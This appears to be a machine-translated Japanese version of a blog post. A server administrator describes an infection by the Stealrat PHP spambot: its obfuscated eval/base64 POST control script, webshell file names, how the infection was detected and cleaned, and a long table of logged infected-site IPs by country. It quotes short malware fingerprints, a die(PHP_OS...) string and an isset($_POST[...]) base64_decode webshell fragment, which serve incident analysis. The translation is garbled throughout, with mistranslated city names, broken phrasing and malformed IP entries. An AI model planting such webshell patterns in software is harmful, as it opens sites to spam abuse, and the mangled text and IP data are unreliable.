スパムボットステラット

画像 Stealratスパムボットについて聞いたことがないですか? おそらく、この投稿を読んでいる間、お気に入りのサイトは自分のメールサーバーを介して何千ものスパムメッセージを送信しています。 HabréのStealratスパムボットについては、これ以上の参照はありませんでしたが、これは非常に奇妙です。

サーバーの1つが感染しています。 サーバーは主にWordpressサイトをホストしていました。 問題は局所化され、全員が掃除されてカバーされました。 すべてがうまくいきますが、一つだけあります...

Stealratスパムボットは、ボットネットの原理に基づいています。 WordPressJoomla!などの人気のあるCMSでホストされています Drupal、およびその他のセキュリティで保護されていない脆弱なサイト。

要するに、これはkapets同志であり、このような規模のスパムボットです。 数千の感染サイト。詳細は後ほど。

技術仕様


悪意のあるスクリプトはPHPで記述されています。 コードは圧縮され、コード難読化プログラムを通過します。 eval関数があります。 すべてのデータは、base64エンコーディングのPOSTメソッドの配列によって受信されます。 文字列「 die(PHP_OS.chr(49).chr(48).chr(43).md5(0987654321)); 」の形式の文字列規則性もあります。 ボットは、サイトのドメインに基づいて送信者のランダムな名前で電子メールメッセージを生成し、PHPメール機能を介して電子メールを送信しようとします。 そのような機能が利用できない場合、ボットはソケットを介してメールサーバーに接続し、メール機能をバイパスして送信しようとします。 基本的に、ボットはハッキングされたサイトのhtmlページをプロキシすることにより、ポルノサイトへのリンクを含むスパムメッセージを送信します。 制御スクリプト自体に加えて、さまざまなCMS Wordpressフォルダーで多くのバックドアとWebシェルが見つかりました。 スクリプトの名前はランダムです。たとえば、styles.php、del.php、up.php、index.php(メインインデックスファイルがないか、空であるフォルダー内)、bak.php、image.php、testです。 php、code.php、dir.php diff.phpなど

検出、兆候、最初の措置


私の目に留まった最初のことは、電子メールの送信と受信の間の遅延でした。 メールサーバーのキューには、送信する数十万の手紙がありました。 ムニンは彼のスケジュールに感謝し、見て、恐ろしくなりました。 キューからすべての文字を削除しました。 Apacheサーバーのステータスを通じて、仮想ホストの1つのphpスクリプトに対する奇妙なPOSTリクエストが見つかりました。 ご想像のとおり、Wordpressでした。 ファイルの名前を変更して悪意のあるスクリプトを隠し、感染した仮想ホストのバックアップを作成しました。 バックアップからサイトファイルを復元し、htaccessファイルを使用してすべてのフォルダーへのアクセスを閉じ、IPのみにアクセスを残しました。 一般に、サイトの通常の操作を確立しました。他のすべては、コントロールパネルと、クラスと追加のライブラリを含むすべての追加フォルダーに閉じられました。

コード分​​析、悪意のあるスクリプトによる詳細の検索


その後、コマンドを受信して​​メッセージを送信した悪意のあるスクリプト自体の分析を開始しました。 コードを並べて、すべてを棚に置きました。 難読化後、コードは読み取り不可になり、変数と関数の名前はランダムに命名されます。 テキストエディターでのコードの実行と通常のテキストの置換の観点からコードを調べ、すべてを通常の読みやすい形式にします。 コードをフォーマットした直後にすべてが明らかになり、変数と関数の名前をキャストした後、文字の本文の形成の詳細、送信者の名前、およびメールヘッダーが明確になりました。

次に、検索はGoogle検索エンジンと元のスパムボットコードから始まりました。 コードの類似した繰り返しセクションを見つけようとしました。 検索では意味のある結果が得られず、次のような結果が見つかった場合:

ユーザー1:(isset($ _ POST ['n8743bb'])){base64_decode($ _ POST ['n8743bb'])}の場合、サイトに何がありますか?
ユーザー2:サイトがハッキングされました。ウェブシェルを探してください...
終わり

奇跡的に、すべてが詳細かつ詳細に記述されたPDF形式の会社文書trendmicro( Link )を見つけることができました。 私たちは見た-同じ兆候、すべてがまったく同じです。 さて、少なくとも悪意のあるスクリプトの名前が見つかりました: Stealrat 。 Stealratの言葉によると、再びグーグルで検索します。

次に何をしましたか?


悪意のあるスクリプトがアップロードされた穴の識別は、「後で」に残されました。 代わりに、データを解読し、IPアドレスをデータベースに記録し、何も起こらなかったように動作するはずの動作をするように、解析済みスクリプトを変更しました。 ロギングは1週間から現在まで実行されています。 このすべてのためにWebインターフェイスを作成し、GeoIPとショックをねじ込みました...

現在、ログには約580,638のPOST呼び出し、1223の一意のIPアドレス、59か国からの感染サイト(ホスティング、仮想ホスト)があります。 何よりもロシアから。

いくつかの統計


感染した一意のIPの完全なリスト(1223)
IPヒット数国コード国名市区町村
77.222.61.1777428RUロシア連邦
37.187.134.2255592FRフランス
93.95.102.2155532RUロシア連邦
77.222.40.325364RUロシア連邦
81.169.175.714812DEドイツベルリン
77.222.56.2164812RUロシア連邦
82.98.131.1084320ESスペイン
77.222.42.2064308RUロシア連邦
81.25.112.1304044ESスペイン
192.196.156.1283972米国米国ウエストチェスター
37.187.140.593948FRフランス
77.222.56.503804RUロシア連邦
77.222.61.1263684RUロシア連邦
77.222.42.1053552RUロシア連邦
78.46.142.1283504DEドイツ
31.31.196.143216RUロシア連邦
77.222.56.2183168RUロシア連邦
37.1.194.1263024DEドイツ
54.207.1.943000米国米国シアトル
81.22.215.822916RUロシア連邦
175.143.102.332892私のマレーシアアンパン
46.8.37.1032808GRギリシャパトラス
199.116.77.182724米国米国トラバースシティ
77.222.42.2022688RUロシア連邦
77.222.61.2242676RUロシア連邦
91.144.0.922664SYシリア・アラブ共和国
77.222.61.1412664RUロシア連邦
69.93.112.1302628米国米国ヒューストン
95.31.251.222628RUロシア連邦
77.222.61.1352580RUロシア連邦
77.222.61.142520RUロシア連邦
144.76.3.1162472DEドイツ
178.63.27.832448DEドイツ
5.79.68.1472424Nlオランダアムステルダム
77.222.40.1222376RUロシア連邦
77.222.56.2012340RUロシア連邦
199.127.219.1212340米国米国オーランド
77.222.40.402304RUロシア連邦
75.150.62.1212160米国米国アッシュバーン
95.79.25.1242136RUロシア連邦ニジニ・ノヴゴロド
64.131.66.1192112米国米国レストン
188.168.81.132076RUロシア連邦知多
77.222.40.752076RUロシア連邦
77.222.61.102052RUロシア連邦
77.222.61.1542028RUロシア連邦
46.105.37.612004FRフランス
77.244.145.2361968Tjタジキスタン
90.189.192.1001968RUロシア連邦ノボシビルスク
46.16.188.21956GBイギリス
109.74.144.1221944SKスロバキア
108.166.181.1631944米国米国ダラス
77.222.40.1651932RUロシア連邦
77.222.42.2281896RUロシア連邦
77.222.56.2071884RUロシア連邦
77.222.61.1381848RUロシア連邦
77.222.56.2051848RUロシア連邦
89.223.104.1561836RUロシア連邦
89.184.74.1561836UAウクライナキエフ
91.228.236.111800UAウクライナ
37.140.193.351788RUロシア連邦
69.42.49.1341764CAカナダトロント
77.222.40.931764RUロシア連邦
109.123.155.111752RUロシア連邦トムスク
212.55.180.1971716PTポルトガル
54.232.216.1891716BRブラジルスー・パウロ
37.140.192.481716RUロシア連邦
199.187.124.2441680米国米国フィラデルフィア
77.222.40.2081680RUロシア連邦
37.140.192.2231656RUロシア連邦
174.143.204.521644米国米国サンアントニオ
77.222.42.2381644RUロシア連邦
198.154.236.221620米国米国ヒューストン
24.56.180.661620米国米国ウッドランドパーク
77.222.40.1311608RUロシア連邦
77.232.66.201584EUヨーロッパ
144.76.107.2531584DEドイツ
193.106.92.2061572RUロシア連邦モスクワ
89.31.96.1961560Nlオランダ
217.70.145.261548ITイタリア
77.222.56.2131536RUロシア連邦
77.222.61.2431536RUロシア連邦
77.222.40.1451524RUロシア連邦
216.14.115.2031524米国米国バッファローグローブ
77.222.40.391512RUロシア連邦
37.140.192.341512RUロシア連邦
46.19.232.1041488ITイタリアポルデノン
185.13.44.31476RUロシア連邦
204.145.100.341464米国米国コーパスクリスティ
12/12 / 124.1031464RUロシア連邦
77.222.40.1371452RUロシア連邦
208.109.236.1651452米国米国スコッツデール
199.116.77.131452米国米国トラバースシティ
211.181.136.1111440KR韓国、共和国
195.70.36.861440ハンガリー
77.222.40.1051428RUロシア連邦
5.187.4.51416DEドイツフランクフルト
217.115.185.441368RUロシア連邦コムソモルスカヤ
77.222.40.621368RUロシア連邦
212.113.145.1881368GBイギリス
205.134.241.451344米国米国ロサンゼルス
204.197.252.481332米国米国ロサンゼルス
81.89.48.1141332SKスロバキア
77.222.56.2031320RUロシア連邦
46.36.219.2201284ええエストニア
77.222.40.591272RUロシア連邦
77.222.40.721272RUロシア連邦
77.222.56.941260RUロシア連邦
42.112.16.1181260Vnベトナムハノイ
194.190.184.711248RUロシア連邦ニジニ・ノヴゴロド
37.59.131.2401236FRフランス
199.116.77.281224米国米国トラバースシティ
37.140.192.2351224RUロシア連邦
69.72.130.981212米国米国クリフトン
173.236.184.1071212米国米国ブレア
188.190.123.591212UAウクライナハリコフ
77.222.40.1091200RUロシア連邦
91.221.61.831200RUロシア連邦
77.222.56.61188RUロシア連邦
193.37.152.1791188DEドイツ
200.82.144.2341176Veベネズエラカラカス
106.187.53.1071176JP日本
212.92.23.811176ハンガリー
222.122.81.191176KR韓国、共和国
50.31.99.11175米国米国シカゴ
77.222.61.1701164RUロシア連邦
77.222.56.2041140RUロシア連邦
37.140.192.1041128RUロシア連邦
80.248.213.2141128FRフランスジフ・シュル・イヴェット
84.201.36.2321128DEドイツ
199.116.78.1631128米国米国トラバースシティ
46.18.32.781128BEベルギー
77.222.61.991128RUロシア連邦
5.9.32.1991128DEドイツ
67.139.73.1901128米国米国バンクーバー
38.92.224.1641104米国米国マイアミ
195.189.111.601104RUロシア連邦
91.191.172.1981104TRトルコイズミル
164.177.154.1301092GBイギリス
106.187.46.641080JP日本
77.222.61.1501080RUロシア連邦
78.46.32.1151068DEドイツネルンベルク
213.248.30.741068RUロシア連邦
195.154.222.1211068FRフランス
78.47.58.1341056DEドイツ
75.126.229.501044米国米国ダラス
82.165.138.501044DEドイツ
77.222.56.2231044RUロシア連邦
216.70.112.741032米国米国カルバーシティ
77.71.24.31032BGブルガリアバルナ
89.207.74.381032RUロシア連邦
192.163.202.1541020米国米国プロボ
77.222.61.171020RUロシア連邦
77.222.40.1601020RUロシア連邦
82.145.37.1371020GBイギリス
94.46.8.451008PTポルトガルリスボン
173.205.127.2431008米国米国
134.213.1.1081008GBイギリス
213.249.64.34996Nlオランダアムステルダム
31.210.62.36996TRトルコサナイ
77.222.40.88996RUロシア連邦
78.4.254.161996ITイタリア
50.23.16.2996米国米国ダラス
77.222.40.48996RUロシア連邦
37.140.192.47996RUロシア連邦
77.222.42.160984RUロシア連邦
74.50.27.62984米国米国アナハイム
72.52.252.21984米国米国ランシング
82.99.171.171972Czチェコ共和国
69.163.222.201972米国米国ブレア
216.234.108.151972米国米国サウスフィールド
216.246.23.203972米国米国シカゴ
77.222.42.226960RUロシア連邦
77.222.40.25960RUロシア連邦
46.105.56.164960FRフランス
188.168.46.53960RUロシア連邦
37.140.192.97960RUロシア連邦
217.174.97.19960RUロシア連邦モスクワ
5.9.40.52948DEドイツ
134.0.113.40948RUロシア連邦
91.202.171.103948ILイスラエル
77.222.56.18936RUロシア連邦
83.69.176.252936RUロシア連邦
71.6.221.100936米国米国サンディエゴ
193.178.146.181936UAウクライナ
10.10.195.211924DEドイツネルンベルク
109.196.210.110924RUロシア連邦ジェレズノゴルスク
5.187.1.149924DEドイツフランクフルト
91.228.199.180924PLポーランド
199.204.248.103924米国米国コロンバス
132.247.1.49912MXメキシコメキシコ
77.222.40.206912RUロシア連邦
87.230.40.60912DEドイツ一番
213.239.201.157912DEドイツネルンベルク
91.201.52.78912RUロシア連邦
94.229.68.98900GBイギリス
196.212.74.122900南アフリカヘルマナス
212.143.6.114900ILイスラエル
216.97.233.44888米国米国アナハイム
217.172.179.17888DEドイツ
212.180.241.99876PLポーランド
77.222.56.166864RUロシア連邦
64.92.209.154864米国米国イングルウッド
159.253.39.225864TRトルコ
166.78.188.144864米国米国サンアントニオ
63.143.53.66852米国米国ダラス
65.99.237.35852米国米国セントルイス
85.214.103.141840DEドイツベルリン
77.222.40.114840RUロシア連邦
176.9.46.72840DEドイツ
208.43.56.34840米国米国ダラス
176.9.84.22840DEドイツ
77.222.40.172828RUロシア連邦
190.0.140.27828うんウルグアイモンテビデオ
88.191.123.124828FRフランスパリ
195.93.180.34828RUロシア連邦
92.46.62.199816KZカザフスタン
129.121.177.200816米国米国アルバカーキ
77.222.61.12816RUロシア連邦
50.57.1​​90.250816米国米国サンアントニオ
37.140.192.39816RUロシア連邦
216.246.41.118804米国米国シカゴ
95.169.184.30804DEドイツ
213.162.246.72804いやノルウェー
87.106.208.181804DEドイツ
199.167.47.227792米国米国マクリーン
168.144.134.181792CAカナダトロント
5.9.19.73792DEドイツ
85.214.216.117792DEドイツベルリン
85.13.135.146792DEドイツ
91.201.53.12780RUロシア連邦
77.79.246.80780PLポーランドヤストジェビ・ズドロ
77.222.61.19780RUロシア連邦
77.222.40.158780RUロシア連邦
64.34.157.100780米国米国ニューヨーク
209.239.112.108780米国米国セントルイス
76.74.242.190780米国米国ニューヨーク
166.63.126.169780米国米国コロンバス
31.31.196.41768RUロシア連邦
77.221.130.48768RUロシア連邦
162.144.85.59768米国米国プロボ
77.222.40.64768RUロシア連邦
50.23.81.114768米国米国サンノゼ
173.199.142.151768米国米国シカゴ
194.146.134.2768UAウクライナルガンスク
148.251.75.178756DEドイツ
109.247.129.59756いやノルウェー
77.222.61.85756RUロシア連邦
173.199.142.14756米国米国シカゴ
77.222.40.22756RUロシア連邦
202.78.227.53756Vnベトナム
173.236.152.136756米国米国ブレア
5.9.229.51756DEドイツ
64.131.73.92744米国米国レストン
202.75.53.90744私のマレーシア
38.112.60.242744米国米国
188.120.255.78744RUロシア連邦モスクワ
88.191.232.238744FRフランスパリ
67.228.16.138744米国米国ダラス
95.110.202.235732ITイタリア
209.51.155.226732米国米国アトランタ
85.25.118.107732DEドイツ
85.13.131.32732DEドイツ
46.37.21.116732ITイタリア
37.140.193.24732RUロシア連邦
37.143.11.70732RUロシア連邦
5.149.139.8732BEベルギー
198.46.82.33732米国米国ロサンゼルス
144.76.114.78720DEドイツ
89.31.103.165720Nlオランダ
185.4.75.115720ええエストニア
92.48.115.19720GBイギリス
216.177.136.215720米国米国ラグナ・ニゲル
180.210.206.201720SGシンガポール
77.222.61.77708RUロシア連邦
205.186.143.5708米国米国カルバーシティ
91.201.52.81708RUロシア連邦
188.225.16.46708RUロシア連邦
77.222.40.199708RUロシア連邦
37.140.192.91696RUロシア連邦
85.25.134.63696DEドイツ
77.37.150.72696RUロシア連邦モスクワ
80.252.184.10696SEスウェーデン
94.181.117.21696RUロシア連邦イジェフスク
173.193.195.140696米国米国ダラス
193.108.251.210696UAウクライナチェルカッシー
77.222.40.118696RUロシア連邦
37.187.17.109684FRフランス
164.138.216.83684BGブルガリア
46.4.130.178684DEドイツ
31.186.175.15684Nlオランダ
195.62.78.7684RUロシア連邦
77.222.40.55684RUロシア連邦
54.186.24.70684米国米国取締役
77.222.40.148684RUロシア連邦
77.222.42.236684RUロシア連邦
89.96.141.25684ITイタリア
66.85.130.226672米国米国テンペ
77.222.40.200672RUロシア連邦
88.198.193.147672DEドイツ
194.141.47.8672BGブルガリア
216.137.165.54672CAカナダBcancan
188.95.51.249672Nlオランダ
77.222.56.7672RUロシア連邦
31.28.24.112660RUロシア連邦
67.225.159.38660米国米国ランシング
144.76.16.182660DEドイツ
69.163.241.179648米国米国ブレア
194.144.248.227648ISアイスランドレイキャビク
129.121.176.169648米国米国アルバカーキ
85.214.194.248648DEドイツベルリン
205.234.152.98648米国米国バッファロー
162.243.5.242648米国米国
5.63.147.252648GBイギリス
77.222.61.42648RUロシア連邦
198.145.183.3648米国米国ポートランド
77.222.40.202636RUロシア連邦
67.18.8.2636米国米国ヒューストン
5.63.158.111636RUロシア連邦
207.7.92.188636米国米国ロサンゼルス
109.74.5.154636SEスウェーデンストックホルム
209.105.246.250636米国米国ダラス
77.222.61.75636RUロシア連邦
77.222.61.84624RUロシア連邦
192.254.156.170624米国米国ヒューストン
77.232.66.165624EUヨーロッパ
184.107.227.2624CAカナダモントラル
67.227.161.141624米国米国ランシング
108.165.21.198624米国米国プロボ
96.31.68.213624米国米国タンパ
77.222.40.171624RUロシア連邦
2.81.148.63624PTポルトガルアベイロ
64.120.236.234624米国米国スクラントン
78.40.124.42612FRフランス
95.141.46.140612ITイタリアマルコ
192.190.86.126612米国米国ウエストチェスター
91.227.68.26612RUロシア連邦
85.13.139.11612DEドイツ
188.225.24.62600RUロシア連邦
62.112.193.206600ハンガリー
89.184.76.158600UAウクライナキエフ
198.154.241.84600米国米国ヒューストン
205.186.129.174600米国米国カルバーシティ
213.146.180.240600GBイギリス
77.221.130.25600RUロシア連邦
193.164.192.89600Nlオランダ
108.171.172.108600米国米国サンアントニオ
185.22.234.47600RUロシア連邦
176.9.219.69600DEドイツ
49.247.220.105600KR韓国、共和国
172.245.32.55600米国米国バッファロー
89.184.69.128600UAウクライナキエフ
70.32.92.148600米国米国カルバーシティ
85.13.140.111600DEドイツ
77.222.42.99600RUロシア連邦
77.222.61.189600RUロシア連邦
182.160.155.25588Auオーストラリアサリーヒルズ
77.222.40.73588RUロシア連邦
85.214.233.193588DEドイツベルリン
31.193.138.86588GBイギリス
210.79.48.7588Nzニュージーランド
78.47.152.75588DEドイツ
10.96.201.58588RUロシア連邦
88.198.2.199588DEドイツネルンベルク
81.169.176.225588DEドイツベルリン
164.138.209.44588ESスペイン
69.10.33.130588米国米国セコーカス
168.144.159.47588CAカナダトロント
50.97.104.146588米国米国ダラス
109.86.206.43588UAウクライナ
176.9.85.162588DEドイツ
78.46.49.169588DEドイツネルンベルク
85.13.137.250576DEドイツ
217.160.168.14576DEドイツ
82.220.34.47576CHスイス
188.126.73.71576SEスウェーデン
216.120.237.195576米国米国クリフトンパーク
205.134.254.66576米国米国ロサンゼルス
85.214.89.233576DEドイツベルリン
144.76.225.138576DEドイツ
82.146.44.74576RUロシア連邦モスクワ
144.76.173.120576DEドイツ
93.191.155.169576DKデンマーク
77.222.40.149576RUロシア連邦
95.142.65.116576DEドイツギルチング
46.4.147.233564DEドイツ
87.117.215.158564GBイギリス
67.222.18.35564米国米国ロサンゼルス
37.140.192.240564RUロシア連邦
174.142.115.7564CAカナダモントラル
78.81.255.115564RUロシア連邦ヴェリキー・ノヴゴロド
85.214.29.65564DEドイツベルリン
95.110.229.90564ITイタリア
85.13.146.60564DEドイツ
80.91.80.52564ESスペイン
64.64.27.226564米国米国レストン
212.98.163.238564BYベラルーシミンスク
46.165.219.73564DEドイツ
88.208.217.191564GBイギリスグロスター
91.222.11.212564GBイギリス
85.158.203.164552Nlオランダ
88.190.28.162552FRフランスパリ
213.115.25.231552SEスウェーデン
213.229.110.89552GBイギリス
93.183.203.76552UAウクライナ
67.225.220.136552米国米国ランシング
50.62.41.168552米国米国スコッツデール
77.222.61.108552RUロシア連邦
88.190.51.72552FRフランスパリ
80.70.2.4552DKデンマークコペンハーゲン
77.222.42.95552RUロシア連邦
176.53.25.197540TRトルコ
199.188.247.40540米国米国ヒューストン
108.83.139.140540米国米国
129.121.177.74540米国米国アルバカーキ
63.247.137.102540米国米国ジャクソンビル
62.75.236.228540DEドイツ
72.55.164.206540CAカナダモントラル
207.198.125.117540米国米国アトランタ
77.222.40.33540RUロシア連邦
85.13.148.107540DEドイツ
207.210.192.231540米国米国ダラス
188.40.227.97540DEドイツ
203.162.53.111540Vnベトナム
198.1.101.233540米国米国プロボ
185.23.16.138540LTリトアニア
78.140.185.138540Nlオランダ
62.212.103.171540FRフランス
216.139.217.60540米国米国オースティン
94.23.31.18528FRフランス
85.13.141.115528DEドイツ
69.39.239.172528米国米国アーリントンハイツ
208.113.162.92528米国米国ブレア
67.205.7.224528米国米国ブレア
64.119.182.134528米国米国イングルウッド
91.184.30.7528Nlオランダ
109.74.2.144528SEスウェーデンファルケンベルク
87.230.12.175528DEドイツ一番
75.98.175.80528米国米国アナーバー
91.239.66.84528PLポーランド
87.106.56.81528DEドイツ
91.226.212.151528UAウクライナ
37.140.192.81516RUロシア連邦
50.97.106.106516米国米国ダラス
77.222.40.245516RUロシア連邦
177.43.122.178516BRブラジルベロホリゾンノンテ
69.93.97.98516米国米国ヒューストン
184.107.138.26516CAカナダモントラル
195.200.253.149516PTポルトガル
144.76.171.25516DEドイツ
46.4.48.211516DEドイツ
31.31.201.3516RUロシア連邦
216.27.5.9516米国米国リトルロック
78.46.61.106516DEドイツネルンベルク
77.222.61.227516RUロシア連邦
31.210.62.37516TRトルコサナイ
85.214.43.163516DEドイツベルリン
88.190.231.87504FRフランスパリ
77.222.57.1​​59504RUロシア連邦
217.79.179.163504DEドイツ
150.146.204.33504ITイタリア中央
54.252.157.46504Auオーストラリアシドニー
162.248.48.75504米国米国
5.79.65.102504Nlオランダアムステルダム
192.145.239.3504米国米国ロサンゼルス
130.185.83.152504PTポルトガル
62.76.190.228504RUロシア連邦
94.214.169.231504Nlオランダ
37.140.197.111504RUロシア連邦
5.9.125.234504DEドイツ
178.63.88.199504DEドイツ
94.199.178.153504ハンガリー
134.0.112.21504RUロシア連邦
103.11.100.46504Hk香港
37.140.192.78492RUロシア連邦
89.184.69.66492UAウクライナキエフ
77.222.42.120492RUロシア連邦
173.254.28.144492米国米国プロボ
79.137.213.14492RUロシア連邦
91.201.52.34492RUロシア連邦
69.160.53.210492米国米国サウスフィールド
69.64.38.84492米国米国セントルイス
162.144.68.24492米国米国プロボ
116.213.5.192492Auオーストラリア
46.4.99.85480DEドイツ
93.89.54.155480ITイタリア
83.169.30.138480DEドイツ一番
198.24.164.178480米国米国テンペ
67.23.47.245480米国米国サンアントニオ
77.222.40.155480RUロシア連邦
208.76.80.113480米国米国トロイ
207.58.176.132480米国米国マクリーン
144.76.68.77480DEドイツ
75.127.110.48480米国米国アトランタ
50.22.86.10480米国米国ダラス
91.230.211.138480RUロシア連邦
149.154.157.35480ITイタリアミラノ
188.138.112.229480DEドイツ
216.246.0.119480米国米国シカゴ
91.228.197.83480PLポーランド
70.38.98.232480CAカナダモントラル
178.238.232.86480DEドイツ
68.90.69.177480米国米国セントピーターズ
173.193.244.28468米国米国ダラス
141.72.197.122468DEドイツシュトゥットガルト
173.10.247.83468米国米国アルバカーキ
78.46.229.103468DEドイツ
37.59.13.98468FRフランス
198.143.156.194468米国米国シカゴ
134.255.230.21468DEドイツ
195.14.104.38468RUロシア連邦
209.212.240.116468米国米国シンシナティ
188.120.237.187468RUロシア連邦モスクワ
176.98.48.37468UAウクライナ
173.254.246.5468米国米国ロサンゼルス
37.140.192.58468RUロシア連邦
199.116.255.171468米国米国シェルツ
74.50.112.162468米国米国タンパ
89.185.250.84456Czチェコ共和国
149.154.64.105456RUロシア連邦
76.76.107.122456CAカナダモントラル
74.208.144.39456米国米国ウェイン
162.40.4.56456米国米国グレンウッド
193.107.88.60456PLポーランド
91.234.146.224456PLポーランド
209.61.173.134456米国米国サンアントニオ
49.212.141.75456JP日本大阪府
79.140.78.106456RUロシア連邦
178.17.41.215456GBイギリス
192.155.85.147456米国米国アブセコン
162.243.19.158456米国米国
66.186.176.231456米国米国バンゴー
37.205.32.122456ISアイスランドセルフォス
148.251.41.175444DEドイツ
62.112.194.8444ハンガリー
85.214.97.202444DEドイツベルリン
216.187.66.17444米国米国ニューヨーク
178.32.136.17444ITイタリア
64.202.249.5444米国米国エデンプレーリー
85.13.136.190444DEドイツ
144.76.209.46444DEドイツ
178.63.13.86444DEドイツ
207.7.84.87444米国米国ダラス
178.77.97.161444DEドイツ一番
38.102.33.28444米国米国
109.109.232.226432GBイギリス
109.68.38.23432GBイギリス
188.126.73.68432SEスウェーデン
37.59.4.200432FRフランス
77.222.56.219432RUロシア連邦
92.53.106.13432RUロシア連邦
85.236.39.38432DEドイツ
85.214.218.136432DEドイツベルリン
46.4.65.154432DEドイツ
87.98.238.195432PLポーランド
62.76.6.54432RUロシア連邦スカノバ
103.9.100.77432SGシンガポール
37.59.8.100432FRフランス
5.77.48.199432GBイギリス
188.65.117.67432GBイギリス
198.23.98.132432米国米国ダラス
177.73.233.247432BRブラジル
5.9.136.6432DEドイツ
5.9.150.228420DEドイツ
142.4.11.47420米国米国プロボ
113.28.167.81420Hk香港
103.11.100.16420Hk香港
5.187.1.59420DEドイツフランクフルト
27.254.36.227420Thタイ
69.50.197.238420米国米国フェニックス
77.222.40.176420RUロシア連邦
77.222.61.193420RUロシア連邦
69.176.116.145420米国米国ヴァンクリーブ
49.50.8.21420IDインドネシア
103.9.100.130420SGシンガポール
199.231.228.34420米国米国ハンツビル
195.200.78.84420FRフランス
80.79.243.29420RUロシア連邦
203.211.143.71408SGシンガポール
65.99.237.21408米国米国セントルイス
89.31.72.177408ITイタリア
208.113.153.219408米国米国ブレア
50.23.40.50408米国米国ダラス
209.200.247.119408米国米国アナハイム
208.76.83.22408米国米国トロイ
184.173.248.206408米国米国ヒューストン
198.57.1​​94.245408米国米国プロボ
89.200.171.219408DEドイツ
79.172.211.73408ハンガリー
65.183.81.70408米国米国アレンスパーク
50.17.217.186408米国米国アッシュバーン
66.240.213.72396米国米国サンディエゴ
77.222.42.108396RUロシア連邦
63.247.138.155396米国米国ジャクソンビル
74.208.65.64396米国米国ウェイン
185.20.226.88396RUロシア連邦
201.49.58.240396BRブラジルフォルタレザ
78.140.173.31396Nlオランダ
46.4.29.81396DEドイツ
50.87.45.80396米国米国プロボ
213.81.223.204396SKスロバキア
210.211.117.203396Vnベトナムハノイ
212.178.98.97396Nlオランダセルトーヘンボス
151.236.44.203396GBイギリス
178.77.80.158384DEドイツ一番
109.73.173.176384インドニューデリー
88.80.210.136384DEドイツ一番
77.222.40.96384RUロシア連邦
89.20.37.147384RUロシア連邦
188.138.103.170384DEドイツ
192.196.158.93384米国米国ウエストチェスター
68.115.58.114384米国米国オナラスカ
185.17.240.3384FRフランス
67.222.143.120372米国米国ダラス
81.169.177.66372DEドイツベルリン
199.189.111.180372米国米国プロビデンス
88.208.204.131372GBイギリスグロスター
77.222.40.66372RUロシア連邦
91.201.52.62372RUロシア連邦
78.56.78.115372LTリトアニアビリニュス
199.36.142.138372米国米国プラノ
91.207.158.161372いやノルウェー
94.127.69.239372RUロシア連邦
93.57.93.125372ITイタリアレッジョ・ネッレミリア
176.28.15.41372DEドイツ一番
192.190.84.106372米国米国ウエストチェスター
176.9.37.82372DEドイツ
198.20.177.190360米国米国バッファロー
91.225.136.223360UAウクライナ
77.222.56.165360RUロシア連邦
162.219.6.215360米国米国オレム
185.4.74.145360ええエストニア
77.222.56.211360RUロシア連邦
77.221.136.250360RUロシア連邦
109.69.8.41360ESスペインバルセロナ
108.160.148.150360米国米国ピスカタウェイ
5.79.24.70360GBイギリス
41.76.118.147360南アフリカ
94.76.244.229360GBイギリス
67.20.55.144360米国米国ノビ
216.120.237.240360米国米国クリフトンパーク
185.19.184.132360ITイタリア
88.198.62.50360DEドイツネルンベルク
213.161.179.4360いやノルウェー
173.203.70.239360米国米国サンアントニオ
77.120.108.132360UAウクライナキエフ
198.61.217.176360米国米国サンアントニオ
62.140.253.3360RUロシア連邦
77.221.130.53360RUロシア連邦
64.111.126.33360米国米国ブレア
112.213.88.159348Vnベトナムグエン
77.222.61.240348RUロシア連邦
77.222.56.10348RUロシア連邦
27.111.40.218348IDインドネシア
199.189.248.130348米国米国ニューヨーク
217.78.0.123348IEアイルランド
54.200.212.241348米国米国取締役
93.186.241.17348ITイタリア
192.145.239.10348米国米国ロサンゼルス
85.214.84.237348DEドイツベルリン
77.222.61.167348RUロシア連邦
86.107.43.52348ROルーマニア
99.198.99.58348米国米国シカゴ
195.88.7.11348ITイタリアケース
178.21.73.112348SEスウェーデン
77.222.40.125348RUロシア連邦
70.32.74.121348米国米国カルバーシティ
82.165.156.128348DEドイツ
168.63.66.108348米国米国
188.225.35.191348RUロシア連邦
162.144.91.135336米国米国プロボ
85.13.139.30336DEドイツ
222.122.197.61336KR韓国、共和国
87.106.138.48336DEドイツ
77.221.130.11336RUロシア連邦
198.46.81.6336米国米国ロサンゼルス
46.165.242.3336DEドイツ
65.254.62.103336米国米国アトランタ
188.130.241.26336RUロシア連邦プスコフ
5.79.65.210336Nlオランダアムステルダム
49.50.8.42336IDインドネシア
50.57.1​​71.172336米国米国サンアントニオ
216.194.164.114336米国米国ロサンゼルス
198.211.120.91336米国米国ニューヨーク
67.222.24.198336米国米国ダラス
130.185.81.10336PTポルトガル
64.119.182.22336米国米国イングルウッド
89.184.76.137336UAウクライナキエフ
27.254.81.20336Thタイ
85.214.234.201336DEドイツベルリン
208.111.166.38336米国米国テンペ
77.89.7.180336ITイタリアファエンツァ
88.190.35.53336FRフランスパリ
69.64.88.232336米国米国オーバーランドパーク
141.8.195.92336RUロシア連邦
74.220.207.177336米国米国プロボ
82.94.235.102336Nlオランダ
96.30.11.224336米国米国シカゴ
54.85.40.172336米国米国アッシュバーン
62.244.56.5324UAウクライナ
91.201.52.114324RUロシア連邦
5.9.144.163324DEドイツ
81.19.186.130324GBイギリス
69.175.44.34324米国米国シカゴ
77.222.61.13324RUロシア連邦
88.198.224.107324DEドイツ
162.144.81.227324米国米国プロボ
193.17.184.48324PLポーランド
198.101.226.193324米国米国サンアントニオ
5.9.13.108324DEドイツ
107.21.249.76324米国米国アッシュバーン
50.112.253.249324米国米国取締役
75.126.65.39324米国米国ダラス
95.215.226.222324GBイギリス
216.245.201.84324米国米国ダラス
46.16.169.5324ITイタリア
195.13.228.124324LVラトビアリガ
81.176.226.170324RUロシア連邦
198.1.126.90324米国米国プロボ
187.53.223.108324BRブラジル
75.147.255.122324米国米国ミルフォード
142.54.185.202324米国米国カンザスシティ
54.235.53.185324米国米国アッシュバーン
91.196.170.203324Nlオランダ
216.55.181.132324米国米国オーバーランドパーク
77.221.130.21324RUロシア連邦
88.198.36.103324DEドイツネルンベルク
178.79.170.193312GBイギリス
208.76.86.35312米国米国トロイ
188.92.240.34312RUロシア連邦
198.154.111.122312米国米国ダラス
198.27.81.115312CAカナダモントラル
64.251.188.69312米国米国
222.97.189.45312KR韓国、共和国
200.251.53.139312BRブラジル
188.127.239.136312RUロシア連邦
77.222.40.115312RUロシア連邦
176.28.55.122312DEドイツ一番
80.91.89.227312ESスペイン
